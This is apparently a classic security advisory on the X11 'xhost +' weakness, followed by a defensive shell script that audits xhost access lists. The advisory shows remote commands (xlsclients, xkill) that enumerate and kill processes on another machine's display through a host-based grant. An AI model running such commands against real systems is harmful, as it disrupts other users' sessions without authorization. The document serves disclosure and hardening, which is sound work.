COMMAND

    xhost

SYSTEMS AFFECTED

    Systems running X server in "xhost +" mode.

PROBLEM

    myhost% xhost + bad

    Anyone from bad can do quite a lot of things on myhost through the
    X server, even if you do not allow remote shell between myhost and
    bad.

    Example:
    Start a client on myhost, say xeyes, with xhost + bad in effect:

        myhost% xhost + bad
        myhost% xeyes &

    Then, from bad, run:

        bad% xlsclients -a -l -display myhost:0

    You will get, among other things, something like:

        bad% Window 0x5000007:
        Machine:  myhost
        Name:  xeyes
        Icon Name:  xeyes
        Command:  xeyes
        Instance/Class:  xeyes/XEyes

    Then you can do:

        bad% xkill -id 0x5000007 -display myhost:0

    And guess what, you just killed a process on another machine
    without using remote shell (if you did not own the process, it
    would have worked just as well).  And there are a lot of other
    tricks you could use ...
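
A check for the exposure described above, as an added example that is not part of the original advisory: it reads the access list that xhost prints and flags disabled access control or any host-based grant. The sample list and the user name alice are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the advisory): flag X access-control entries that
# expose a display to remote hosts. Entry formats are the ones xhost prints.

# audit_xhost: reads `xhost` output on stdin, prints one finding per risky
# line, returns 0 when nothing risky is listed and 1 otherwise.
audit_xhost() {
    findings=0
    while IFS= read -r line; do
        case "$line" in
            "access control disabled"*)
                # State left by a bare "xhost +": every host may connect.
                echo "CRITICAL: access control disabled, any host can connect"
                findings=$((findings + 1)) ;;
            "access control enabled"*|"")
                ;;  # status line or blank line, nothing to report
            SI:localuser:*|LOCAL:*)
                ;;  # local-only grants, not reachable from another machine
            *)
                # Anything else names a host (INET:bad, INET6:..., bare name).
                echo "WARNING: host-based grant for $line"
                findings=$((findings + 1)) ;;
        esac
    done
    [ "$findings" -eq 0 ]
}

# Constructed sample of what `xhost` could print on myhost after the
# commands in the advisory; on a live session run: xhost | audit_xhost
audit_xhost <<'EOF' || echo "display is exposed, review the grants above"
access control enabled, only authorized clients can connect
INET:bad
SI:localuser:alice
EOF
```

A flagged host entry can be removed with `xhost -name`, and xauth cookies give per-user authorization without trusting a whole host.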